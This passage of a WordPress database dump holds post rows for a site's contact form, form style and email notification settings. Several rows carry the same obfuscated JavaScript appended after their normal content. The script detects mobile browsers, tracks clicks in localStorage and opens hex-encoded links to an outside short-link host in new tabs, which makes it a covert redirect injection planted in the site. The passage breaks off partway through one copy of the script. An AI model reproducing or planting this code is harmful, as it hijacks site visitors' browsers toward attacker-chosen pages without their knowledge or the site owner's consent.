)|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Email Notification','email','publish','open','open','','1_email_1','','','2015-04-06 17:18:12','2015-04-06 17:18:12','',0,'https://gsw2023.com/index.php/frm_form_actions/1_email_1/',1,'frm_form_actions','',0),
(5369,1,'2023-08-22 21:58:27','2023-08-22 21:58:27','{\"theme_css\":\"ui-lightness\",\"theme_name\":\"UI Lightness\",\"center_form\":\"\",\"form_width\":\"100%\",\"form_align\":\"left\",\"direction\":\"ltr\",\"fieldset\":\"0px\",\"fieldset_color\":\"000000\",\"fieldset_padding\":\"0 0 15px 0\",\"fieldset_bg_color\":\"\",\"title_size\":\"40px\",\"title_color\":\"444444\",\"title_margin_top\":\"10px\",\"title_margin_bottom\":\"60px\",\"form_desc_size\":\"14px\",\"form_desc_color\":\"666666\",\"form_desc_margin_top\":\"10px\",\"form_desc_margin_bottom\":\"25px\",\"form_desc_padding\":\"0\",\"font\":\"\",\"font_size\":\"15px\",\"label_color\":\"3f4b5b\",\"weight\":\"normal\",\"position\":\"none\",\"align\":\"left\",\"width\":\"150px\",\"required_color\":\"B94A48\",\"required_weight\":\"bold\",\"label_padding\":\"0 0 3px 0\",\"description_font_size\":\"12px\",\"description_color\":\"666666\",\"description_weight\":\"normal\",\"description_style\":\"normal\",\"description_align\":\"left\",\"description_margin\":\"0\",\"field_font_size\":\"14px\",\"field_height\":\"32px\",\"line_height\":\"normal\",\"field_width\":\"100%\",\"auto_width\":\"\",\"field_pad\":\"6px 10px\",\"field_margin\":\"20px\",\"field_weight\":\"normal\",\"text_color\":\"555555\",\"border_color\":\"BFC3C8\",\"field_border_width\":\"1px\",\"field_border_style\":\"solid\",\"bg_color\":\"ffffff\",\"remove_box_shadow\":\"\",\"bg_color_active\":\"ffffff\",\"border_color_active\":\"66afe9\",\"remove_box_shadow_active\":\"\",\"text_color_error\":\"444444\",\"bg_color_error\":\"ffffff\",\"border_color_error\":\"B94A48\",\"border_width_error\":\"1px\",\"border_style_error\":\"solid\",\"bg_color_disabled\":\"ffffff\",\"border_color_disabled\":\"E5E5E5\",\"text_color_disabled\":\"A1A1A1\",\"radio_align\":\"block\",\"check_align\":\"block\",\"check_font_size\":\"13px\",\"check_label_color\":\"444444\",\"check_weight\":\"normal\",\"section_font_size\":\"18px\",\"section_color\":\"444444\",\"section_weight\":\"bold\",\"section_pad\":\"15px 0 3px 0\",\"section_mar_top\":\"15px\",\"section_mar_bottom\":\"30px\",\"section_bg_color\":\"\",\"section_border_color\":\"e8e8e8\",\"section_border_width\":\"2px\",\"section_border_style\":\"solid\",\"section_border_loc\":\"-top\",\"collapse_icon\":\"6\",\"collapse_pos\":\"after\",\"repeat_icon\":\"1\",\"repeat_icon_color\":\"ffffff\",\"submit_style\":\"\",\"submit_font_size\":\"15px\",\"submit_width\":\"auto\",\"submit_height\":\"auto\",\"submit_bg_color\":\"579AF6\",\"submit_border_color\":\"579AF6\",\"submit_border_width\":\"1px\",\"submit_text_color\":\"ffffff\",\"submit_weight\":\"normal\",\"submit_border_radius\":\"4px\",\"submit_bg_img\":\"\",\"submit_margin\":\"10px\",\"submit_padding\":\"10px 20px\",\"submit_shadow_color\":\"eeeeee\",\"submit_hover_bg_color\":\"efefef\",\"submit_hover_color\":\"444444\",\"submit_hover_border_color\":\"cccccc\",\"submit_active_bg_color\":\"efefef\",\"submit_active_color\":\"444444\",\"submit_active_border_color\":\"cccccc\",\"border_radius\":\"4px\",\"error_bg\":\"F2DEDE\",\"error_border\":\"EBCCD1\",\"error_text\":\"B94A48\",\"error_font_size\":\"14px\",\"success_bg_color\":\"DFF0D8\",\"success_border_color\":\"D6E9C6\",\"success_text_color\":\"468847\",\"success_font_size\":\"14px\",\"important_style\":\"\",\"progress_bg_color\":\"eaeaea\",\"progress_active_color\":\"ffffff\",\"progress_active_bg_color\":\"579AF6\",\"progress_color\":\"3f4b5b\",\"progress_border_color\":\"E5E5E5\",\"progress_border_size\":\"2px\",\"progress_size\":\"24px\",\"custom_css\":\"\"}\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Formidable Style','','publish','closed','closed','','formidable-style','','','2023-08-22 21:58:27','2023-08-22 21:58:27','',0,'https://gsw2023.com/index.php/frm_styles/formidable-style/',1,'frm_styles','',0),
(5372,1,'2023-08-22 22:52:20','2023-08-22 22:52:20','\r\n','GSW2023 Contact Form','','inherit','closed','closed','','5364-revision-v1','','','2023-08-22 22:52:20','2023-08-22 22:52:20','',5364,'https://gsw2023.com/?p=5372',0,'revision','',0),
(5373,1,'2023-08-22 22:53:46','2023-08-22 22:53:46','[vform id=\"1\"]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const 